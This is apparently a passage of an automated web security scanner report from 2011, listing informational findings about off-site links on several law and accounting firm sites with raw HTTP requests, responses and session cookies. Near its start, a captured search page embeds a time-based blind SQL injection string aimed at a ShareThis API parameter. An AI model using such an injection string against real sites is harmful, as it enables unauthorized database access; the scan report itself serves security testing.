User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:25:36 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80264

<!doctype html> <head> <title>GET /api/getApi.php?return=json&amp;cb=getPubGA_onSuccess&amp;service=getPublisherDomains&amp;publisher=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1User-Agent:
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=GET+/api/getApi.php%3Freturn%3Djson%26cb%3DgetPubGA_onSuccess%26service%3DgetPublisherDomains%26publisher%3D-111%2527%2520OR%2520SLEEP(25)%3D0%2520LIMIT%25201--%2B+HTTP/1.1User-Agent:+Mozilla/4.0+(compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%3B+.NET+CLR+1.1.4322)Cache-Control:+no-cacheHost:+wd.sharethis.comAccept-Encoding:+gzip,+deflate&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/2011/04/22/xml/blind-sql-injection-database-user-admin-cwe89-dork-ghdb-wd.sharethis.com_80.xml" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">http://wd.sharethis.com/<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:pIo0AioeJGsJ:xss.cx/2011/04/22/xml/blind-sql-injection-database-user-admin-cwe89-dork-ghdb-wd.sharethis.com_80.xml+GET+/api/getApi.php%3Freturn%3Djson%26cb%3DgetPubGA_onSuccess%26service%3DgetPublisherDomains%26publisher%3D-111%2527%2520OR%2520SLEEP(25)%3D0%2520LIMIT%25201--%2B+HTTP/1.1User-Agent:+Mozilla/4.0+(compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%3B+.NET+CLR+1.1.4322)Cache-Control:+no-cacheHost:+wd.sharethis.comAccept-Encoding:+gzip,+deflate&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:pIo0AioeJGsJ:xss.cx/2011/04/22/xml/blind-sql-injection-database-user-admin-cwe89-dork-ghdb-wd.sharethis.com_80.xml+GET+/api/getApi.php%3Freturn%3Djson%26cb%3DgetPubGA_onSuccess%26service%3DgetPublisherDomains%26publisher%3D-111%2527%2520OR%2520SLEEP(25)%3D0%2520LIMIT%25201--%2B+HTTP/1.1User-Agent:+Mozilla/4.0+(compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%3B+.NET+CLR+1.1.4322)Cache-Control:+no-cacheHost:+wd.sharethis.comAccept-Encoding:+gzip,+deflate&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com','','','','1','','0CBgQIDAA')">Cached</a>
...[SNIP]...
24.70. http://www.hunton.com/aboutus/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:27:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div class="navitem"><a href="http://www.huntoncareers.com" id="ctl00_xprLayout_cphHeader_ctl00_mainLeftQ_mainNavSimpleGlobal_ctl13_topUrl" target="_blank" class="">Careers</a>
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
24.71. http://www.hunton.com/disclaimer/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /disclaimer/uniGC.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /disclaimer/uniGC.aspx?xpST=Disclaimer HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:30:25 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1855; path=/
Set-Cookie: PortletId=5992402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div class="navitem"><a href="http://www.huntoncareers.com" id="ctl00_xprLayout_cphHeader_ctl00_mainLeftQ_mainNavSimpleGlobal_ctl13_topUrl" target="_blank" class="">Careers</a>
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
24.72. http://www.hunton.com/news/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/uniGC.aspx?xpST=PENSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=1c95740e-93e3-4ab2-893b-b01eb3a4d9a2; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div class="navitem"><a href="http://www.huntoncareers.com" id="ctl00_xprLayout_cphHeader_ctl00_mainLeftQ_mainNavSimpleGlobal_ctl13_topUrl" target="_blank" class="">Careers</a>
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
24.73. http://www.hunton.com/professionals/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=11598f11-187a-435f-b543-d78ee2a48a53; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div class="navitem"><a href="http://www.huntoncareers.com" id="ctl00_xprLayout_cphHeader_ctl00_mainLeftQ_mainNavSimpleGlobal_ctl13_topUrl" target="_blank" class="">Careers</a>
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
24.74. http://www.hunton.com/services/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /services/uniGC.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /services/uniGC.aspx?xpST=ServiceList HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=e6106238-84c2-4133-bcd7-11d59e2420c7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div class="navitem"><a href="http://www.huntoncareers.com" id="ctl00_xprLayout_cphHeader_ctl00_mainLeftQ_mainNavSimpleGlobal_ctl13_topUrl" target="_blank" class="">Careers</a>
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
24.75. http://www.hunton.com/sitemap/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /sitemap/uniGC.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sitemap/uniGC.aspx?xpST=SiteMap HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:30:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1856; path=/
Set-Cookie: PortletId=5993402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div class="navitem"><a href="http://www.huntoncareers.com" id="ctl00_xprLayout_cphHeader_ctl00_mainLeftQ_mainNavSimpleGlobal_ctl13_topUrl" target="_blank" class="">Careers</a>
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
24.76. http://www.ilumennetwork.com/CPA/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ilumennetwork.com
Path:   /CPA/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CPA/?org=lbmc HTTP/1.1
Host: www.ilumennetwork.com
Proxy-Connection: keep-alive
Referer: http://lbmc.imonitor.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:34:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=smqzne45qonfib55ltnhdii0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
</a>
&nbsp; &nbsp;&nbsp;
<a href="http://iis.imonitor.net/Tutorials/cpa/Benchmarking/index.html" target="_blank">
<img id="ctl00_ContentPlaceHolder_center_imgViewDemo" src="images/btnViewDemo.png" style="border-width:0px;" />
...[SNIP]...
<span class="strong">Click <a href="https://www.imonitornetwork.com/newaccts/?req=lbmc&camp=register">REGISTER</a>
...[SNIP]...
<area shape="rect" coords="38,162,128,182" href="financialDashboard.aspx" title="Learn about the Financial Dashboard" alt="Learn about the Financial Dashboard" /><area shape="rect" coords="172,162,260,182" href="http://ilumen.com/tutorials/cpa/CompanyDashboard/" target="_blank" title="View Dashboard Demo" alt="View Dashboard Demo" />
</map>
...[SNIP]...
<td class="footer"><a href="http://lbmc.com" target="_blank">Lattimore, Black, Morgan & Cain Corporate Web Site</a>
...[SNIP]...
24.77. http://www.lbmc.com/sites/all/modules/extlink/extlink.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmc.com
Path:   /sites/all/modules/extlink/extlink.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sites/all/modules/extlink/extlink.js?U HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/about-lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.1.10.1304749048; SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:26:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 May 2010 01:25:56 GMT
ETag: "6011a-1146-27d47100"
Accept-Ranges: bytes
Content-Length: 4422
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:26:05 GMT
Connection: close
Content-Type: application/x-javascript

// $Id: extlink.js,v 1.4.2.12 2010/05/26 01:25:56 quicksketch Exp $
(function ($) {

function extlinkAttach(context) {
// Strip the host name down, removing ports, subdomains, or www.
var pattern
...[SNIP]...
</a> Empty tags.
// <a href="http://user:pass@example.com">example</a>
...[SNIP]...
24.78. https://www.mavitunasecurity.com/welcome/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /welcome/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /welcome/?v=1.9.0.5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.mavitunasecurity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2451
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:11:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   
<head>
<link rel="styl
...[SNIP]...
<p><a href="https://netsparker.zendesk.com/forums/130204-feature-requests" target="_blank">Request or vote for a feature</a>
...[SNIP]...
<li><a href="https://netsparker.zendesk.com/entries/123169-sample-scan" target="_blank">Quick Netsparker Tour Video</a>
...[SNIP]...
